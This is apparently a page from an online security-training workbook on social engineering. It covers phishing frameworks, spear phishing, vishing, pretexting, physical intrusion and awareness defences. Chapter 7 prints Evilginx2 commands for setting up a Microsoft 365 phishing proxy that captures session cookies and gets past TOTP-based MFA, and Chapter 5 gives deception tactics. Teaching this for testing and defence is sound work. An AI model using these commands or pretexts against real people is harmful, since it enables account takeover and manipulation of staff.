Chapter 1 โ€” The Human Attack Surface

The most sophisticated technical defences can be bypassed by a single employee clicking a link. Social engineering exploits human psychology โ€” authority, urgency, fear, and trust โ€” rather than software bugs. In real engagements, social engineering is often the fastest path to initial access.

Chapter 2 โ€” Phishing Campaigns

# GoPhish โ€” open source phishing framework
# Key components:
# 1. Sending profile (SMTP config)
# 2. Landing page (credential capture or malware download)
# 3. Email template (the lure)
# 4. Target group (email list)
# 5. Campaign tracking (open, click, and submit rates)

Chapter 3 โ€” Spear Phishing & Whaling

Spear phishing targets specific individuals with personalised lures built from OSINT. Whaling targets executives (CEOs, CFOs). The personalisation dramatically increases success rates. Reference real events: "your AWS invoice from yesterday", "your Zoom meeting at 3pm", "invoice INV-2025-0342 attached".

Chapter 4 โ€” Vishing & Smishing

Vishing (voice phishing) involves calling the target and posing as IT, a bank, or a vendor. The goal is to request a password reset, MFA code, or VPN credentials verbally. Smishing uses SMS messages with urgent links. Both exploit the social pressure of a real-time interaction.

Chapter 5 โ€” Pretexting Scenarios

Build a convincing backstory before any interaction. Common pretexts: IT support performing an upgrade, new employee needing help getting set up, external auditor verifying compliance, vendor arriving to service equipment. The best pretexts are impossible to verify quickly.

Chapter 6 โ€” Physical Intrusion

Tailgating (following someone through a secure door), badge cloning (RFID/NFC), and impersonation (delivery person, maintenance crew). Once inside: deploy a network implant, access unlocked workstations, photograph sensitive documents, or plug in a USB attack device.

Chapter 7 โ€” Evilginx & Credential Harvesting

# Evilginx2 โ€” reverse proxy phishing (bypasses TOTP-based MFA)
# Sits between victim and the legitimate site
# Captures session cookies, not just passwords
# Works even when the target uses 2FA

# Setup a phishlet for Microsoft 365
evilginx
config domain yourdomain.com
config ip YOUR_SERVER_IP
phishlets hostname o365 login.yourdomain.com
phishlets enable o365
lures create o365

Chapter 8 โ€” Security Awareness Defence

Effective defences: regular phishing simulation programmes with post-click training, hardware FIDO2 security keys (resistant to Evilginx-style attacks), zero-trust architecture requiring verification for every request, callback verification procedures (always call back on a known number, never a number provided by the caller), and a strong reporting culture that rewards employees who flag suspicious contact.

โœ…
Workbook complete! You've covered all chapters. Mark it complete below and continue your learning path.
โ† All Workbooks
๐Ÿ“–
Sign in to track progress